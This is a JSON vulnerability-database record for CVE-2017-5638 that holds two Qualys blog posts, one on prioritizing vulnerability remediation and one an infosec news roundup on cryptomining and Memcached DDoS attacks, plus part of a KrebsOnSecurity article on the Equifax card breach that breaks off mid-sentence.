{"lastseen": "2019-01-23T20:50:12", "description": "![](https://blog.qualys.com/wp-content/uploads/2018/05/cyber-security-1923446_1920-600x384.png)Here\u2019s a stat that shows the importance of prioritizing vulnerability remediation: Almost 30% of the CVEs disclosed in 2017 had a CVSS score of \u201cHigh\u201d or \u201cCritical.\u201d That works out to about 3,000 such vulnerabilities, or about 58 every week.\n\nGiven this large number of severe vulnerabilities, it\u2019s critical for IT and security teams to make a deeper assessment of the risk they represent in the context of their organizations\u2019 IT environment.\n\nIf they identify the vulnerabilities that pose the highest risk to their organization\u2019s most critical assets, they\u2019ll be able to prioritize remediation accordingly and eliminate the most serious and pressing threats to their IT environment.\n\nHowever, as evidenced by the long list of major breaches caused by unpatched vulnerabilities, it\u2019s hard for many businesses, government agencies and not-for-profit organizations to prioritize remediation consistently and accurately.\n\n\u201cOne of the big challenges that we have as security professionals is trying to stay on top of our vulnerability management,\u201d Josh Zelonis, a Forrester Research analyst, said during a recent [webcast](<https://www.qualys.com/webcasts/prioritization-vulnerabilities-modern-it-environment/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=webcast&leadsource=344565181>).\n\nZelonis, who cited the CVE stat during the webcast, said that, according to a 2017 Forrester survey of global businesses, 58% of them experienced at least one breach in the previous 12 months. Among those, 41% of the breaches were carried out by exploiting a vulnerability.\n\n\u201cThis is really representative of the problems we\u2019re seeing in the industry with prioritization and getting patches deployed, and this is only increasing,\u201d he said.\n\n\u201cIn a post-Equifax world, VM is coming under increased scrutiny,\u201d Zelonis added, alluding to the massive data breach suffered by the credit reporting agency in 2017 after hackers exploited the Apache Struts vulnerability (CVE-2017-5638), which had been disclosed about six months before.\n\nRead on to learn valuable best practices for prioritizing remediation, and how Qualys can help your organization overcome this critical challenge.\n\n### Vulnerability management and prioritization tips\n\nAccording to Zelonis, the vulnerability risk management process has four main steps: \n\n * Asset identification\n * Enumeration of assets\n * Prioritization of patching\n * Remediation\n\nWhen assigning remediation priorities, it\u2019s key to examine the severity of the vulnerabilities in the context of each asset. \n\nFor example, it should be a top priority to remediate a critical vulnerability in an asset that\u2019s highly important. However, remediating that same vulnerability may not be a top priority when it\u2019s present in an asset of medium or low importance. \n\nIn vulnerability management, it\u2019s also helpful to use threat intelligence not just to detect threats, but to also preemptively patch using threat landscape trends as a guide.\n\n\u201cIt\u2019s important to understand how a vulnerability can be exploited so you can take a look at at the assets within your organization to figure out where patches need to be prioritized and applied,\u201d Zelonis said.\n\nThreat intelligence is also essential for security teams to be able to communicate effectively with C-level executives and board members, who are increasingly interested in staying informed about the organization\u2019s security posture and strategy.\n\n\u201cOnce you\u2019ve made it relevant to them, they\u2019re going to need to understand what you\u2019re doing to mitigate the situations and perhaps allocate additional budget where necessary,\u201d he said.\n\nIt\u2019s also important to communicate this information not just to the higher-ups, but also horizontally across other IT teams such as operations, and across business units, because vulnerability remediation requires cross-functional collaboration.\n\n\u201cThis is a major gap we see with organizations who are struggling to get items patched: The security team\u2019s priorities aren\u2019t echoed nor understood outside of the security team,\u201d he said.\n\nThe goal here is to make these other teams aware of the real risk and potential business impact of particular vulnerabilities.\n\nUltimately, organizations should evolve from vulnerability management to vulnerability risk management. That way, the focus isn\u2019t just on reducing false positives, but rather on assessing critical data points and metrics to attain an understanding of risk, according to Zelonis.\n\n### Qualys: Asset visibility, vulnerability management and threat prioritization\n\nWith Qualys, you\u2019ll get complete visibility of your IT assets wherever they reside -- on premises, in clouds or at remote endpoints -- and you\u2019ll be able to continuously detect and asses all your vulnerabilities, and precisely prioritize remediation.\n\nWith proper vulnerability management, you \u201cimmunize\u201d your IT assets against opportunistic attacks which are designed to exploit common, well-known bugs and which are the most likely to hit your network.\n\nLet\u2019s look at three Qualys products that work in tandem to provide you with this asset visibility, vulnerability detection and remediation prioritization.\n\n_Qualys AssetView_\n\n[Qualys AssetView](<https://www.qualys.com/apps/asset-inventory/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) automates collection and categorization of IT and security information, and provides a unified view of this data.\n\n\u201cIt brings IT and security data together,\u201d Qualys Product Management Director Jimmy Graham said during the webcast, titled \u201cPrioritization of Vulnerabilities in a Modern IT Environment.\u201d\n\n![](https://blog.qualys.com/wp-content/uploads/2018/05/ai-screenshot-dashboard-2x.jpg)\n\nThe data, which is fed into the Qualys Cloud Platform for aggregation, indexing, correlation, and analysis, is continuously collected and updated using a variety of sensors, including:\n\n * Physical and virtual appliances that scan IT assets located on-premises, in private clouds, or in virtualized environments\n * Cloud appliances that remotely scan your infrastructure-as-a-service (IaaS) and platform-as-a-service (PaaS) instances in commercial cloud computing platforms\n * Lightweight, all-purpose cloud agents installed on IT assets that continuously monitor them\n\nThe data is made searchable via AssetView\u2019s search engine using ad-hoc queries. In addition, any query can be turned into interactive, continuously updated widgets in AssetView\u2019s customizable and dynamic dashboards. You can also generate detailed and custom-tailored reports.\n\nThis inventory provides both a complete \u201chorizontal\u201d list of IT assets as well as deep \u201cvertical\u201d details for each asset, including hardware specs, installed software, network connections, approved users, applied patches, and open vulnerabilities. \n\nIn addition, Qualys AssetView lets you assign criticality rankings to assets, since not all assets carry the same weight within your organization. Qualys lets you [tag your assets](<https://blog.qualys.com/news/2017/02/28/making-asset-inventory-actionable-with-a-cloud-based-system>), so you put relevant labels on them in the inventory and organize them in multiple ways.\n\n_Qualys Vulnerability Management_\n\n[Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) provides continuous, comprehensive coverage and visibility, as well as constant monitoring and alerts, in a way that makes vulnerability assessment effective in a \u201cperimeter-less world,\u201d according to Graham.\n\n\u201cWe call that \u2018perimeter-less world\u2019 because we collect vulnerabilities from on premises devices, and from private and public clouds. Through the agent, we can collect vulnerability information from roaming devices like laptops that employees may be using in a coffee shop or at home,\u201d he said.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/05/vm-screenshot-report-2x.jpg)\n\nQualys VM maps all assets on the network, detailing their OS, ports, services and certificates, and scans them for vulnerabilities with Six Sigma 99.99966 percent accuracy. It assigns remediation tickets, manages exceptions, lists patches for each host, and integrates with existing IT ticketing systems.\n\nIn addition, VM generates comprehensive reports customized for different recipients \u2014 like IT pros, business executives or auditors \u2014 and incorporates context and insight, including progress against goals. Via VM\u2019s APIs, the reporting data can be integrated with other security and compliance systems.\n\nWhen VM is paired with the Qualys Continuous Monitoring (CM) app, you\u2019ll be alerted about potential threats \u2014 such as new hosts/OSes, expiring certificates, unexpected open ports and unauthorized software \u2014 so problems can be tackled before turning into breaches. \n\n_Qualys Threat Protection_\n\nTo prioritize remediation work, you must continuously correlate vulnerability disclosures with your organization\u2019s IT asset inventory, so that you get a clear picture of the vulnerabilities that exist in each IT asset.\n\nThis is what [Qualys Threat Protection (TP)](<https://www.qualys.com/apps/threat-protection/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) does, and more.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/05/tp-screenshot-dashboard-2x.jpg)\n\nQualys TP continuously correlates external real-time threat indicators (RTIs) against your internal vulnerabilities and IT asset data, so you can take full control of evolving threats and identify what to remediate first.\n\n\u201cWhat ties this all together is Qualys Threat Protection,\u201d Graham said.\n\nRTIs add valuable context to a vulnerability, such as whether: \n\n * It\u2019s being actively attacked in the wild\n * There\u2019s an exploit kit available for it\n * It can lead to high data loss or to a denial of service attack\n * It\u2019s a \u201czero day\u201d with no patch available\n\nRegarding IT assets, you should consider factors such as their role in business operations, their interconnectedness with other assets, their Internet exposure and their user base.\n\nOut of this type of in-depth analysis will emerge a clear picture of your threat landscape, and based on it, you\u2019ll be able to come up with an accurate remediation plan.\n\nQualys TP features include:\n\n * Robust Data Analysis\n\nQualys TP continuously correlates external threat information against your vulnerabilities and IT asset inventory, leveraging Qualys Cloud Platform\u2019s robust back-end engine to automate this large-scale and intensive data analysis process. \n\n * Live Threat Intelligence Feed\n\nAs Qualys engineers continuously validate and rate new threats from internal and external sources, Qualys TP\u2019s Live Threat Intelligence Feed displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details.\n\nQualys Threat Protection, working in tandem with [Qualys AssetView](<https://www.qualys.com/apps/asset-inventory/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) and [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>), helps you to proactively and continuously detect assets and vulnerabilities, and prioritize remediation in your IT environment.\n\n_Watch a recording of the [webcast](<https://www.qualys.com/webcasts/prioritization-vulnerabilities-modern-it-environment/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=webcast&leadsource=344565181>), which has a lot more details, a demo of Qualys Threat Protection, and a Q&A session with the audience._", "cvss3": {}, "published": "2018-05-07T16:00:10", "type": "qualysblog", "title": "How To Prioritize Vulnerabilities in a Modern IT Environment", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-05-07T16:00:10", "id": "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "href": "https://blog.qualys.com/news/2018/05/07/how-to-prioritize-vulnerabilities-in-a-modern-it-environment", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T20:50:13", "description": "![](https://blog.qualys.com/wp-content/uploads/2018/03/307px-Bitcoin_logo.svg_.png)In this week\u2019s InfoSec news review we\u2019ll dive into cryptomining, get the latest on DDoS amplification, go over recent data breaches, and check out another vendor claiming it can crack iPhones.\n\n### I, me, mine\n\nThe freight train that\u2019s cryptomining shows no sign of slowing down, and the cyber security implications are intensifying accordingly.\n\nThis week alone, Microsoft [detected and disrupted](<http://www.newsweek.com/crypto-mining-malware-outbreak-infected-500000-computers-single-day-836145>) a massive cryptomining malware campaign, a Tesla AWS account[ got hijacked](<http://fortune.com/2018/02/20/tesla-hack-amazon-cloud-cryptocurrency-mining/>), a new mining worm [was discovered](<https://securityboulevard.com/2018/03/worm-infects-redis-and-windows-servers-with-cryptomining-malware/>), and Kaspersky researchers warned about increased[ sophistication of infection methods](<https://www.businesswire.com/news/home/20180305005866/en/Million-Kaspersky-Lab-Identifies-Sophisticated-Hacker-Groups>). \n\nWhile there is a legitimate component to this business, malicious hackers eager to profit are aggressively breaching networks and infecting devices -- PCs, IoT systems, smartphones, servers -- to steal computing power for mining virtual currencies.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/03/Cryptocurrency_Mining_Farm-600x338.jpg)_A cryptocurrency mining farm in Iceland. (Photo credit: By [Marco Krohn - Own work, CC BY-SA 4.0](<https://commons.wikimedia.org/w/index.php?curid=40495567>))_\n\nThe creation and verification process of virtual currencies like Bitcoin and Monero involves solving lengthy and complex mathematical calculations that require large amounts of [computing power](<https://www.coindesk.com/nvidia-cfo-crypto-mining-demand-beat-expectations-q4/>). Those involved in this [\u201cblockchain\u201d process](<https://www.investopedia.com/tech/how-does-bitcoin-mining-work/>) earn money from it, and the payouts have skyrocketed as the value of these cryptocurrencies has dramatically increased in the past several months.\n\nThat has attracted the attention both of legitimate players -- [individuals](<http://www.businessinsider.com/mining-cryptocurrency-making-a-profit-2018-2>) and [businesses](<https://www.theverge.com/2018/2/13/17008158/salon-suppress-ads-cryptocurrency-mining-coinhive-monero-beta-testing>) -- and, unfortunately, of bad actors, who are using malware to gain unauthorized access to systems they then leverage for mining.\n\n\u201cExploit kits are now delivering coin miners instead of ransomware. Scammers are adding coin mining scripts in tech support scam websites. And certain banking trojan families added coin mining behavior,\u201d Microsoft\u2019s Windows Defender team stated in its [blog post](<https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/>).\n\nBetween September and January, the number of websites hosting cryptomining scripts [spiked 725%](<https://www.cyren.com/blog/articles/increase-in-cryptocurrency-mining-threatens-more-than-just-your-cpu>), Cyren Security Lab said recently. That figure includes domains that are hosting these scripts knowingly, as well as those that have been breached.\n\nCryptomining attacks are purposefully stealthy and silent: They avoid noticeably disrupting breached systems\u2019 operations in order to remain undetected. \u201cFor coin miner malware, persistence is key. These types of malware employ various techniques to stay undetected for long periods of time in order to mine coins using stolen computer resources,\u201d reads Microsoft\u2019s blog post.\n\nThus, cryptomining gives hackers \u201call of the financial upside\u201d of ransomware and other attacks without having to engage the victim and while drawing less law enforcement attention, Cisco\u2019s Talos unit [explained](<http://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>) in late January.\n\nAs industry analyst Jason Bloomberg put it in a [Forbes column](<https://www.forbes.com/sites/jasonbloomberg/2018/03/04/top-cyberthreat-of-2018-illicit-cryptomining/#4b6bdcc05ae8>) recently, \u201cransomware is oh, so 2017,\u201d as \u201csmart hackers have turned to illicit cryptomining to fill their coffers\u201d lured by a perfect storm of \u201ceasy money, slim chance of detection, and billions of unsuspecting targets that may not even care they\u2019ve been hacked.\u201d\n\nLast month, Imperva [reported](<https://www.imperva.com/blog/2018/02/new-research-crypto-mining-drives-almost-90-remote-code-execution-attacks/>) that cryptomining now drives almost 90% of all remote code execution attacks. Kaspersky Lab put the number of users attacked by malicious miners[ at 2.7 million in 2017](<https://securelist.com/mining-is-the-new-black/84232/>), up 50% from 2016. And according to Check Point, [23% of global organizations](<https://coinjournal.net/23-organizations-globally-affected-crypto-mining-malware-coinhive-says-cybersecurity-firm/>) were affected in January by the Coinhive crypto-mining malware. \n\nMeanwhile, Malwarebytes Labs [ranks](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) malicious cryptomining as its top detection since September. While acknowledging that malicious cryptomining appears to be far less dangerous to the user than ransomware, Malwarebytes Labs warned that its effects should not be underestimated. \u201cIndeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down,\u201d reads the Malwarebytes Labs post.\n\nOrganizations that have been compromised in recent months include the U.K.\u2019s [Information Commissioner\u2019s Office](<http://www.bbc.com/news/technology-43025788>) (ICO), [U.S. federal courts](<http://fortune.com/2018/02/12/us-courts-coinhive-monero-cryptocurrency-miner/>), [Australian state governments](<https://www.theguardian.com/technology/2018/feb/12/cryptojacking-attack-hits-australian-government-websites>), and the[ LA Times newspaper](<https://nakedsecurity.sophos.com/2018/02/27/unsecured-aws-led-to-cryptojacking-attack-on-la-times/>).\n\nAttack targets have included [vulnerable Jenkins servers](<https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/>), [unsecured Docker containers](<https://blog.aquasec.com/cryptocurrency-miners-abusing-containers-anatomy-of-an-attempted-attack>), [Microsoft Windows systems](<https://securityboulevard.com/2018/03/worm-infects-redis-and-windows-servers-with-cryptomining-malware/>), and browsers. Hackers have used multiple types of attack vehicles, including[ malvertising](<https://threatpost.com/ad-network-circumvents-ad-blocking-tools-to-run-in-browser-cryptojacker-scripts/130161/>), email, malware-laced apps, targeted hits, and exploit kits.\n\nFor example, the coin mining campaign detected by Microsoft\u2019s Windows Defender team this week used variants of the Dofoil/Smoke Loader malware in the form of sophisticated trojans with \u201cadvanced cross-process injection techniques, persistence mechanisms, and evasion methods.\u201d\n\nThe Dofoil trojans attacked Explorer.exe with a \u201cprocess hollowing\u201d code-injection technique that created a new instance of the \u201cc:\\windows\\syswow64\\explorer.exe\u201d process and replaced the legit code with malware.\n\n\u201cThe hollowed Explorer.exe process then spins up a second malicious instance, which drops and runs a coin mining malware masquerading as a legitimate Windows binary, wuauclt.exe,\u201d Microsoft explained. Dofoil uses a customized mining application that can mine different cryptocurrencies. To avoid detection, Dofoil modifies the registry, according to Microsoft.\n\nAnd let us not forget good, old physical -- aka, real world -- security breaches. The Associated Press reported that crooks [stole 600 servers](<https://apnews.com/55117fb55a714e909fb9aaf08841a5d6/Bitcoin-heist:-600-powerful-computers-stolen-in-Iceland>) from data centers in Iceland that were being used for cryptomining. The servers, which haven\u2019t been found, are worth $2 million, and were swiped in a series of four heists in December and January. So far, 11 people have been arrested in connection with the investigation.\n\n### Memcached servers used for DDoS attacks\n\nLast week, we [reported](<https://blog.qualys.com/news/2018/03/02/apple-in-the-infosec-spotlight-as-github-falls-prey-to-amplified-ddos-attack>) on the troubling trend among hackers of using unprotected Memcached servers to dramatically [amplify the intensity](<https://www.darkreading.com/attacks-breaches/memcached-servers-being-exploited-in-huge-ddos-attacks/d/d-id/1331149?>) of their DDoS attacks. GitHub was on the receiving end of such a DDoS attack last week, which at the time was considered [the most intense ever](<http://www.zdnet.com/article/github-was-hit-with-the-largest-ddos-attack-ever-seen/>).\n\nWell, that record lasted for only a few days. This week, Arbor Networks [detected](<https://www.arbornetworks.com/blog/asert/netscout-arbor-confirms-1-7-tbps-ddos-attack-terabit-attack-era-upon-us/>) an even stronger DDoS attack against an unnamed customer of a U.S.-based service provider. The attack, according to Arbor Networks, reached 1.7Tbps at its peak and utilized the same Memcached reflection/amplification attack vector involved in the GitHub attack, which peaked at 1.35Tbps.\n\n \n\n![](https://blog.qualys.com/wp-content/uploads/2018/03/Mar2018_Peak_Attack_Size.png)_(Source: Arbor Networks)_\n\n \n\nThe open source Memcached software is meant to be used behind firewalls on internal networks to boost server performance, but many organizations have made them available from the Internet, and hackers are using them to significantly boost their DDoS attacks.\n\n\u201cWhile the internet community is coming together to shut down access to the many open Memcached servers out there, the sheer number of servers running Memcached openly will make this a lasting vulnerability that attackers will exploit,\u201d reads Arbor Networks\u2019 blog post.\n\nFor detailed information about this trend, in which attackers leverage the User Datagram Protocol (UDP), check out the write-ups from [Akamai](<https://blogs.akamai.com/2018/02/memcached-udp-reflection-attacks.html>), [Link11](<https://www.link11.com/en/blog/new-high-volume-vector-memcached-reflection-amplification-attacks/>) and [Cloudflare](<https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/>).\n\n\u201cAn attacker spoofing the UDP address of their intended victim can send just a small packet of data to a Memcached server, tricking it into blasting as much as 50,000 times more data in response,\u201d [wrote](<https://hotforsecurity.bitdefender.com/blog/world-record-broken-again-ddos-attack-exceeds-1-7-terabits-per-second-19653.html#new_tab>) security analyst Graham Cluley. \u201cThe result? A data tsunami.\u201d\n\nIn encouraging news, eWeek [reported on Friday](<http://www.eweek.com/security/memcached-ddos-attacks-slow-down-as-patching-ramps-up>) that patching efforts were starting to make a dent on these amplified DDoS attacks, according to the latest data gathered by Arbor and Cloudflare. \"We're still seeing lots of them, but their average size is considerably smaller due to ongoing cleanup and mitigation efforts,\" Steinthor Bjarnason, senior network security analyst at Arbor's Netscout unit, told eWEEK.\n\n### Another digital forensics vendor claims it can crack iPhones\n\nOn the heels of Cellebrite\u2019s recent claims that it can unlock and extract data from devices running all modern iOS versions including the most recent one, another digital forensics vendor is quietly making similar promises.\n\nForbes [reported](<https://www.forbes.com/sites/thomasbrewster/2018/03/05/apple-iphone-x-graykey-hack/#7b81709b2950>) this week that a \"mysterious\" company called GrayKey is distributing marketing materials that describe online and offline tools that allow it to unlock devices running iOS 10 and iOS 11, including the latest iPhone X.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/03/iPhone_X_family_line_up-600x565.jpg)_A second digital forensics vendor now claims it can crack iOS devices, including the iPhone X, pictured here. (Photo credit: Apple)_\n\nForbes\u2019 February [report](<https://www.forbes.com/sites/thomasbrewster/2018/02/26/government-can-access-any-apple-iphone-cellebrite/#cb3ce1f667a0>) on Cellebrite\u2019s claims -- which extend to Android devices as well -- generated a lot of concern among privacy and security experts.\n\nCellebrite has been telling its customers, which are primarily government, military and corporate investigative teams, that it\u2019s able to unlock and extract data from devices running iOS 11, such as the iPhone X, as well as other iPhones, iPads and iPods.\n\nConcerns center on the possibility that whatever technique and knowledge Cellebrite -- and now apparently GrayKey -- may possess could fall into the hands of criminals, be independently replicated by bad actors, or be abused by governments.\n\nThe situation also highlights the ongoing tug-of-war between tech vendors and law enforcement agencies, as the former resist watering down encryption on their products, while the latter argue they need access to devices and data for their investigations.\n\n### Speaking of law enforcement\u2019s distaste for strong encryption\n\nThis week FBI Director Christopher Wray, speaking at Boston College's second annual cybersecurity summit, reiterated his agency\u2019s opposition to \u201cunbreakable encryption,\u201d saying it creates \u201ca major public safety issue,\u201d according to a[ CSO Magazine report](<https://www.csoonline.com/article/3261100/encryption/fbi-chief-calls-for-public-private-detente-on-encryption.html#tk.rss_all>).\n\nSaying that in fiscal 2017 FBI investigators failed to retrieve the contents of 7,775 devices to which judges had granted them access, Wray \u201cmade an impassioned appeal for help from the tech sector and the security community,\u201d CSO reported.\n\nIn related news, it transpired this week that the FBI has established close collaboration with Best Buy\u2019s Geek Squad team of computer repair technicians. According to[ documents obtained by the Electronic Frontier Foundation (EFF)](<https://www.eff.org/deeplinks/2018/03/geek-squads-relationship-fbi-cozier-we-thought>), the FBI has been paying Geek Squad staffers for years for tips about illegal material they may find in the computers they\u2019re fixing.\n\n### Data breach included with your meal, your video game and your credit report\n\n![](https://blog.qualys.com/wp-content/uploads/2018/03/applebees-logo-300x200.jpg)\n\nThe Applebee\u2019s restaurant chain recently [discovered](<https://www.rmhfranchise.com/dataincident/>) malware in the POS (point of sale) systems of more than 160 of its eateries. At risk: Customers\u2019 names, credit and debit card numbers, expiration dates and card verification codes.\n\nThe incidents occurred in recent months, going back to November of last year, but Applebee\u2019s didn\u2019t discover the issue until mid-February.\n\n \n\n\u201cWe\u2019re seeing more of these types of breaches happening\u2026 it\u2019s an industry wide problem as more retailers look to an ecosystem of providers to bring in third party systems like point of sale and inventory management solutions,\u201d Fred Kneip, CEO of security firm CyberGRX [told Threatpost](<https://threatpost.com/pos-malware-found-at-160-applebees-restaurant-locations/130281/>). \u201cAs of today a lot of stores are playing catch up with security, and it can take months or years to realize that compromises have happened on third party systems.\u201d\n\nMeanwhile, customers of games developer Nippon Ichi Software (NIS) America are also at risk for credit card fraud and ID theft, after two of its online stores -- [NIS America](<https://store.nisamerica.com/>) and [SNKonlinestore](<https://snkonlinestore.com/>) -- were hacked.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/03/nisa-logo-300x150.jpg)\n\nThe breach occurred on Jan. 23 and wasn\u2019t discovered until Feb. 26. Compromised data included customer name, address, credit card number, expiration date, security code, and email address.\n\nAccording to the email NIS America sent to customers -- as [re-printed by NintendoLive.com](<http://www.nintendolife.com/news/2018/03/nis_americas_online_stores_hacked_credit_card_details_compromised>) -- customers were redirected to an external web page where their information was captured, before being sent back to the company\u2019s online store to complete the transaction.\n\nAnd in the latest chapter of the monster data breach that just keeps on giving, Equifax [disclosed](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) that there are another 2.4 million Americans whose personal data was stolen by hackers in last year\u2019s infamous and massive hack. That ups the total of people affected to about 148 million. The data thieves accessed Equifax\u2019s systems and data by exploiting the Apache Struts CVE-2017-5638 vulnerability, for which a patch was available.\n\n### In other InfoSec news \u2026\n\n * Duo Security, which provides a two-factor authentication app, is detailing a [serious flaw](<https://duo.com/labs/psa/duo-psa-2017-003>) it recently fixed in its product as well as [the flaw\u2019s root cause](<https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations>) -- SAML vulnerabilities -- which also affects third-party products and services. \u201cDuo disclosed the problem responsibly late last year, and after giving vendors \u2013 including itself \u2013 time to fix the bug, has now gone public with an excellent and educational explanation of what went wrong,\u201d [writes](<https://nakedsecurity.sophos.com/2018/02/28/single-sign-on-authentication-the-bug-that-let-you-logon-as-someone-else/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29>) Lisa Vaas in Sophos\u2019 Naked Security blog.\n * Facebook\u2019s Oculus Rift VR headsets temporarily stopped working after the company [let its security certificate lapse](<https://www.theverge.com/2018/3/8/17095414/oculus-rift-software-fix-certificate-expiry>).\n * MoviePass CEO Mitch Lowe set off privacy alarms when he [boasted](<https://www.csoonline.com/article/3260629/privacy/thanks-to-moviepass-app-tracking-ceo-claims-we-know-all-about-you.html>) this week during a keynote address that his company\u2019s eponymous app has such an ability to track its subscribers -- including via GPS data -- that \u201cwe know all about you.\u201d After the inevitable backlash, the company [the next day](<https://www.theverge.com/2018/3/8/17096442/moviepass-updates-ios-app-unused-location-tracking-features>) announced it was removing the app\u2019s location tracking features.\n\n* * *\n\n_With the [Qualys Cloud Platform ](<https://www.qualys.com/cloud-platform/>)and its suite of natively integrated, self-updating security and compliance [Cloud Apps](<https://www.qualys.com/apps/>), Qualys pro__vides automated, continuous and scalable prevention and response__. __Qualys offers customers [complete and instant visibility of IT assets](<https://www.qualys.com/apps/asset-inventory/>) wherever they reside -- on premises, in clouds, and remote endpoints; comprehensive and continuous [vulnerability management](<https://www.qualys.com/apps/vulnerability-management/>); granular [assessment of secure system configurations](<https://www.qualys.com/apps/policy-compliance/>); [monitoring of file integrity](<https://www.qualys.com/apps/file-integrity-monitoring/>); [web application scanning and firewall](<https://www.qualys.com/apps/web-app-scanning/>); [detection of compromise](<https://www.qualys.com/apps/indication-of-compromise/>); and multiple other security and compliance solutions._", "cvss3": {}, "published": "2018-03-09T21:45:09", "type": "qualysblog", "title": "Cryptomining is all the rage among hackers, as DDoS amplification attacks continue", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-09T21:45:09", "id": "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1", "href": "https://blog.qualys.com/news/2018/03/09/cryptomining-is-all-the-rage-among-hackers-as-ddos-amplification-attacks-grow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "krebs": [{"lastseen": "2017-09-17T17:56:36", "description": "**Visa** and **MasterCard** are sending confidential alerts to financial institutions across the United States this week, warning them about more than 200,000 credit cards that were stolen in the epic data breach announced last week at big-three credit bureau **Equifax**. At first glance, the private notices obtained by KrebsOnSecurity appear to suggest that hackers initially breached Equifax starting in November 2016. But Equifax says the accounts were all stolen at the same time -- when hackers accessed the company's systems in mid-May 2017.\n\n![equifax-hq](https://krebsonsecurity.com/wp-content/uploads/2017/09/equifax-hq-580x384.png)\n\nBoth Visa and MasterCard frequently send alerts to card-issuing financial institutions with information about specific credit and debit cards that may have been compromised in a recent breach. But it is unusual for these alerts to state from which company the accounts were thought to have been pilfered.\n\nIn this case, however, Visa and MasterCard were unambiguous, referring to Equifax specifically as the source of an e-commerce card breach.\n\nIn a non-public alert sent this week to sources at multiple banks, Visa said the \"window of exposure\" for the cards stolen in the Equifax breach was between Nov. 10, 2016 and July 6, 2017. A similar alert from MasterCard included the same date range.\n\n\"The investigation is ongoing and this information may be amended as new details arise,\" Visa said in its confidential alert, linking to the press release Equifax initially posted about the breach on Sept. 7, 2017.\n\nThe card giant said the data elements stolen included card account number, expiration date, and the cardholder's name. Fraudsters can use this information to conduct e-commerce fraud at online merchants.\n\nIt would be tempting to conclude from these alerts that the card breach at Equifax dates back to November 2016, and that perhaps the intruders then managed to install software capable of capturing customer credit card data in real-time as it was entered on one of Equifax's Web sites.\n\nIndeed, that was my initial hunch in deciding to report out this story. But according to a statement from Equifax, the hacker(s) downloaded the data in one fell swoop in mid-May 2017.\n\n\u201cThe attacker accessed a storage table that contained historical credit card transaction related information,\" the company said. \"The dates that you provided in your e-mail appear to be the transaction dates. We have found no evidence during our investigation to indicate the presence of card harvesting malware, or access to the table before mid-May 2017.\u201d\n\nEquifax did not respond to questions about how it was storing credit card data, or why only card data collected from customers after November 2016 was stolen.\n\nIn its [initial breach disclosure](<https://investor.equifax.com/news-and-events/news/2017/09-07-2017-213000628>) on Sept. 7, Equifax said it discovered the intrusion on July 29, 2017. The company said the hackers broke in through a vulnerability in the software that powers some of its Web-facing applications.\n\nIn [an update to its breach disclosure](<https://www.equifaxsecurity2017.com/>) published Wednesday evening, Equifax confirmed reports that the application flaw in question was a weakness disclosed in March 2017 in a popular open-source software package called **Apache Struts **([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>))**. **\n\n\"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted,\" the company wrote. \"We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nThe Apache flaw was [first spotted around March 7, 2017](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), when security firms began warning that attackers were actively exploiting a \"zero-day\" vulnerability in Apache Struts. Zero-days refer to software or hardware flaws that hackers find and figure out how to use for commercial or personal gain before the vendor even knows about the bugs.\n\nBy March 8, Apache had released new versions of the software to mitigate the vulnerability. But by that time exploit code that would allow anyone to take advantage of the flaw was already published online -- making it a race between companies needing to patch their Web servers and hackers trying to exploit the hole before it was closed.\n\nScreen shots apparently taken on March 10, 2017 and later posted to the vulnerability tracking site xss[dot]cx indicate that the Apache Struts vulnerability [was present at the time on annualcreditreport.com](<http://xss.cx/2017/03/12/txt/cve-2017-5638-annualcreditreportcom-exploit-poc-content-type-http-header-example.html>) -- the only web site mandated by Congress where all Americans can go to 